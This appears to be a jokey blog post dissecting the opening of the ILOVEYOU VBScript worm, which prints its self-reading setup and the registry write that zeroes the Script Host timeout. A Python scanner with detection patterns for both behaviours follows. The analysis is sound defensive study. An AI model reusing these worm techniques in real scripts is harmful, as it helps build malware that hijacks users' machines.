virus autopsy: ILOVEYOU, part 1

*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, received as an attachment and requiring a manual launch by the user to activate.

scalpel. thorax incision reveals...

    rem barok -loveletter(vbe) (i hate go to school)
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines

    On Error Resume Next
    dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy

    eq = ""
    ctr = 0
    set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
    vbscopy = file.ReadAll

ach, handkerchief. handkerchief! thank you nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them just to read the filesystem... i'll remove them and go under the ribcage.

    main()

    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    ' checks the time out of Windows scripting host
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    if (rr>=1) then
    ' change the script to endless:
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
    end if

alright, hold it there, nurse. you see that? the thing's setting the Windows Script Host's timeout to zero, which means no time limit at all, to stop the host from timing out and exiting before the script is finished. devious, but not devious enough... i think we're done for tonight, nurse.
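
for the lab notes, an added example (not part of the original post or of the specimen): a small python scanner that flags the two behaviours dissected so far in a VBScript file, the script reading its own source and the write that zeroes the WSH timeout. the regexes, the finding names and both sample strings are this example's own assumptions.

```python
import re

# heuristics written for this example; VBScript is case-insensitive, hence re.I
SELF_READ = re.compile(r'OpenTextFile\s*\(\s*WScript\.ScriptFullName', re.I)
# matches the key path used in the listing; also accepts the HKCU abbreviation
# and the "Windows Script Host" spelling of the key
WSH_TIMEOUT = re.compile(
    r'RegWrite\s*\(?\s*"?(?:HKEY_CURRENT_USER|HKCU)\\Software\\Microsoft\\'
    r'Windows Script(?:ing)? Host\\Settings\\Timeout"\s*,\s*(\d+)', re.I)
LISTING_NO = re.compile(r'^\s*\d{3}\s+')  # "023 " style prefixes from pasted listings

def strip_comment(line):
    """Drop listing numbers and VBScript comments so commented-out code is ignored."""
    line = LISTING_NO.sub('', line).strip()
    if re.match(r'rem\b', line, re.I):
        return ''
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:  # apostrophe outside a string starts a comment
            return line[:i]
    return line

def scan(script_text):
    """Return a list of (line_no, finding) tuples for a VBScript source string."""
    findings = []
    for n, raw in enumerate(script_text.splitlines(), 1):
        code = strip_comment(raw)
        if SELF_READ.search(code):
            findings.append((n, 'reads-own-source'))
        m = WSH_TIMEOUT.search(code)
        if m and int(m.group(1)) == 0:  # 0 = no time limit
            findings.append((n, 'wsh-timeout-disabled'))
    return findings

# constructed sample: four lines in the shape of the listing above
SAMPLE = r'''
009 set fso = CreateObject("Scripting.FileSystemObject")
010 set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
019 ' checks the time out of Windows scripting host
023 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
'''.strip()
# constructed benign sample: a commented-out write, then a non-zero timeout
BENIGN = r'''
' wscr.RegWrite "HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
wscr.RegWrite "HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 30, "REG_DWORD"
'''.strip()

if __name__ == '__main__':
    for line_no, finding in scan(SAMPLE):
        print(line_no, finding)
```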

next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.

